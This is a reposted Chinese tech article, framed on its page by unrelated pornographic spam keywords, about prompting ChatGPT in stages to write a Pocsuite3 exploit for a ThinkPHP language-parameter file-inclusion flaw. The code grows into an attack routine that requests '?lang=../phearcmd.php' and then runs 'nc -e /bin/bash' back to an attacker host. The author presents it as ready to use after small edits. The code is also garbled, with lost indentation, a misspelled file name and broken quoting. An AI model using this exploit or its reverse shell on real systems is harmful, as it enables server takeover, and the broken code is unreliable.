色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

通過ChatGPT來快速編寫Pocsuite3

jf_Fo0qk3ln ? 來源:FreeBuf.COM ? 2023-01-29 11:06 ? 次閱讀

通過ChatGPT來快速編寫Pocsuite3

前言

這一模型可以與人類進行談話般的交互,可以回答追問,連續性的問題,承認其回答中的錯誤,指出人類提問時的不正確前提,拒絕回答不適當的問題。

簡單來說,ChatGPT是一個AI,能夠分析我們題出的問題,并且對此做出解答。可以通過ChatGPT來分析代碼,或者讓其根據我們的需求寫出相應的代碼,如下。

99029812-9f08-11ed-bfe3-dac502259ad0.jpg

所以,我就在想,能不能讓它給我們編寫poc,簡化平時的一個工作,于是便有了這篇文章。

分析

發現

我發現,ChatGPT緩存了當此詢問的結果,當我們前后兩個問題相似的時候,ChatGPT會去分析兩個問題的一個相似度,如果相似度過高,則會返回上一次分析的結果。而且對于有歧義的語句,其處理結果誤差比較大,所以我們可以一開始給出一個簡單的語句,然后通過逐步的訓練,讓其結果更加符合我們的預期。

過程

原理

在一開始,最好向CG(ChatGPT的簡稱)提供漏洞的相關原理,但是由我們直接去敘述,其準確性比較低,因為語言存在歧義,那么,我們可以通過引導的方式,去讓CG了解和漏洞有關的信息,比如ThinkPHP最新的漏洞原理是因為多語言模式的開啟導致的文件包含,如果我們直接詢問。

990efa9e-9f08-11ed-bfe3-dac502259ad0.jpg

我們會發現,CG無法為我們解析出來,因為其實在這里lang_switch_on是config.php返回數組中的一個鍵名,準確來說并不是參數,所以這里解析才會出錯。我們知道config.php會返回一個數組,但是CG因為并不會去解析config.php,所以在它并不覺得config.php會返回什么。

992fa726-9f08-11ed-bfe3-dac502259ad0.jpg
但是我們換一種方法,我們詢問,

993b6246-9f08-11ed-bfe3-dac502259ad0.jpg

我們會發現,CG給出了我們一個流程,那么在這里,CG就記住了這一答案,當我們在漏洞原理中加入了這句話,那么CG就能正確解析。

分段

當我們直接通過一大段話讓其給我們編寫程序的時候,你會發現會有很多錯誤,如下。

994a0f1c-9f08-11ed-bfe3-dac502259ad0.jpg

根據我上面的發現,我突然想 ,我們可以先給出一個簡單的需求,在后面不斷基于之前給的答案,增加其準確度就行。如下。

首先,詢問是否知道pocsuite,并要求給出一個例子。

9a3fd186-9f08-11ed-bfe3-dac502259ad0.jpg

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class TestPOC(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'Test POC'
    appPowerLink = 'https://example.com'
    appName = 'Test'
    appVersion = '1.0'
    vulType = 'Test Vul'
    desc = '''Test POC Description'''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        # your code here
        result = {}
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        # your code here
        return output


def main():
    register_poc(TestPOC)


if __name__ == '__main__':
    main()

接著,添加對漏洞的描述,要求其改進。

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
    and a malicious lang parameter must be passed in the URL.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        result = {}
        # your code here
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)

這時候,我們再添加一些信息。

9a53927a-9f08-11ed-bfe3-dac502259ad0.jpg

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands.
'''
samples = ['']

def _attack(self):
    # your code here
    pass

def _verify(self):
    result = {}
    # your code here
    # send a request with a malicious lang parameter
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = url

    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('The vulnerability could not be verified')
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

最后,我們再補充一點。

9a6c8da2-9f08-11ed-bfe3-dac502259ad0.jpg

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands, including a reverse shell.
'''
samples = ['']

def _attack(self):
    # your code here
    # send a request with a malicious lang parameter to include phearcmd.php
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        # send a request to execute a reverse shell command
        command = 'php -r "system('nc -e /bin/bash {0} {1}');"'.format(self.options.get('lhost'), self.options.get('lport'))
        url = self.url + '?phearcmd=' + command
        req.get(url)

def _verify(self):
    result = {}
    # your code here
    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    # no output is necessary for this POC
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

到這里,基本上就可以拿來改改就能直接使用了。

結論

通過以上的利用和分析,我們能感受到CG的一個強大,當CG對于我們的一個問題的解決結果誤差較大的時候,我們可以逐步進行求解,讓其引擎對結果進行不斷的修正,這樣最終的結果誤差較小。以上只是一個簡單的案例,還有更多的可能等待挖掘。

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • AI
    AI
    +關注

    關注

    87

    文章

    31405

    瀏覽量

    269815
  • 模型
    +關注

    關注

    1

    文章

    3291

    瀏覽量

    49028
  • 代碼
    +關注

    關注

    30

    文章

    4818

    瀏覽量

    68873
  • 編寫
    +關注

    關注

    0

    文章

    29

    瀏覽量

    8483
  • ChatGPT
    +關注

    關注

    29

    文章

    1566

    瀏覽量

    7916

原文標題:通過ChatGPT來快速編寫Pocsuite3

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    ChatGPT如何使用RLHF克服GPT-3存在的問題

    ChatGPT 是 OpenAI 發布的最新語言模型,比其前身 GPT-3 有顯著提升。與許多大型語言模型類似,ChatGPT 能以不同樣式、不同目的生成文本,并且在準確度、敘述細節和上下文連貫性上具有更優的表現。
    發表于 03-10 09:41 ?855次閱讀

    寫小說、編寫程序!強大的ChatGPT也有它的局限性!

    神經網絡。Transformer架構廣泛應用于語言翻譯、文本摘要、問答等自然語言處理任務。 ? ChatGPT可用于創建能與用戶進行對話的 聊天機器人 ,由ChatGPT構建的對話機器人,可以高質量的回答用戶的提問,能夠寫小說,編寫
    的頭像 發表于 12-08 00:59 ?5026次閱讀

    【國產FPGA+OMAPL138開發板體驗】(原創)6.FPGA連接ChatGPT 4

    , SEND_TO_CHATGPT = 2, DISPLAY_RESPONSE = 3;: 哇,我們的狀態機好復雜啊,有四個狀態!不過沒關系,我們可以一步步。 再寫個簡單的: 首先,我需要澄清一點,
    發表于 02-14 21:58

    怎么通過FPGA快速檢測DDR3是否工作正常

    在一個項目中,發現數據有異常,想判斷FPGA外掛的DDR3正常工作。因為實際生產中,ddr容易出現虛焊或者使用一段時間后管腳出現接觸不良等問題。{:2:}現在想編寫一個程序快速判斷,
    發表于 04-12 16:56

    科技大廠競逐AIGC,中國的ChatGPT在哪?

    ChatGPT就是在GPT-3的基礎上通過指令微調后得到的。 圖源:OpenAI官網 結果,2022年年底ChatGPT實現了現象級的傳播,這出乎制作團隊所料。OpenAI用了
    發表于 03-03 14:28

    【米爾MYD-JX8MMA7開發板-ARM+FPGA架構試用體驗】4.使用ChatGPT助力測試GPU

    領域的多種應用場景比較適用。本次將測試該開發板的GPU圖形圖像處理能力,并在ChatGPT幫助下使用OpenGL E2.0 開發一個簡單的3D模型實時渲染的應用,及使用ChatGPT
    發表于 04-10 02:07

    SecurityPoc基于Pocsuite3開發的POC插件掃描器

    gitee-security-poc.zip
    發表于 05-06 11:10 ?0次下載
    SecurityPoc基于<b class='flag-5'>Pocsuite3</b>開發的POC插件掃描器

    ChatGPT編寫各種腳本

    最牛逼的還是屬于程序編寫方面,ChatGPT在各個編程語言上面都挺在行的(嘗試了下Python, Perl, Tcl都挺不錯的),可以說是一個各個語言都很了解的程序員了。
    的頭像 發表于 01-13 10:11 ?7421次閱讀

    chatgpt是什么

    chatgpt是什么 ChatGPT,美國OpenAI 。ChatGPT是人工智能技術驅動的自然語言處理工具,它能夠通過學習和理解人類的語言
    發表于 02-10 14:05 ?4w次閱讀

    chatgpt怎么用

    chatgpt怎么用 chatgpt怎么用?chatgpt 簡介 ChatGPT是一種語言模型,它被訓練對對話進行建模。它能夠
    發表于 02-10 14:22 ?5.8w次閱讀

    體驗一下ChatGPT帶我們寫代碼快感

    OpenAI的ChatGPT是一種自然語言處理技術,它可以幫助開發者快速地完成代碼的編寫通過ChatGPT與Python相結合,開發人員
    的頭像 發表于 02-14 09:31 ?2024次閱讀

    如何通過Python與ChatGPT對話

    文章目錄 簡介 安裝 OpenAI API 實例1預備條件: 1. 科學上網; 2.注冊 OpenAI 賬號 。 簡介 ChatGPT 是 GPT-3 語言模型的變體,專為會話語言生成而設計。要在
    發表于 02-15 09:55 ?0次下載
    如何<b class='flag-5'>通過</b>Python與<b class='flag-5'>ChatGPT</b>對話

    ChatGPT for SegmentFault 插件來襲 ChatGPT for SegmentFault 插件使用方案解讀

    ChatGPT for SegmentFault 插件來襲,你真的準備好了嗎?AI的改變有多大,讓我們拭目以待, ? ? ChatGPT for SegmentFault 是一款基于GPT-3的聊天
    的頭像 發表于 02-16 18:45 ?2984次閱讀

    從攻擊視角探討ChatGPT對網絡安全的影響

    、情景模型和語言模型來自動生成文章,甚 至可以按照用戶的要求編寫代碼。 那么ChatGPT會對網絡安全行業帶來哪些影響呢? 接下來我們將通過系列文章,分別從“攻”、“防”、ChatGPT
    的頭像 發表于 02-22 08:15 ?1451次閱讀
    主站蜘蛛池模板: 韩日美无码精品无码| 色婷婷国产精品视频一区二区| 九九在线免费视频| 久久re视频这里精品免费1| 久草在线在线精品观看99| 久久国产高清视频| 久久亚洲欧美国产综合| 美女靠逼漫画| 秋霞成人午夜鲁丝一区二区三区| 日本无吗高清| 性色无码AV久久蜜臀| 一久久| 91麻精品国产91久久久久| yellow免费| 国产人妻麻豆蜜桃色69| 精品久久久噜噜噜久久久app| 老师的玉足高跟鞋满足我| 欧洲精品不卡1卡2卡三卡四卡| 色姣姣狠狠撩综合网| 亚洲福利天堂网福利在线观看| 与子敌伦刺激对白亂輪亂性| av av在线| 国产九九熟女在线视频| 久久xxxx| 秋霞电影网视频一区二区三区 | 3d在线看小舞被躁视频| freehd另类xxxx喷水| 国产AV高清怡春院| 精品一产品大全| 欧美xxxxx18| 香蕉精品国产高清自在自线| 永久免费精品影视网站| www.青青草原| 国产日韩精品一区二区在线观看| 老师你下面好紧夹死了| 乳女教师欲乱动漫无修版动画| 亚洲精品中文字幕在线| chinese学生gv video| 国产亚洲高清视频| 男女高潮又爽又黄又无遮挡| 四虎影视库永久免费|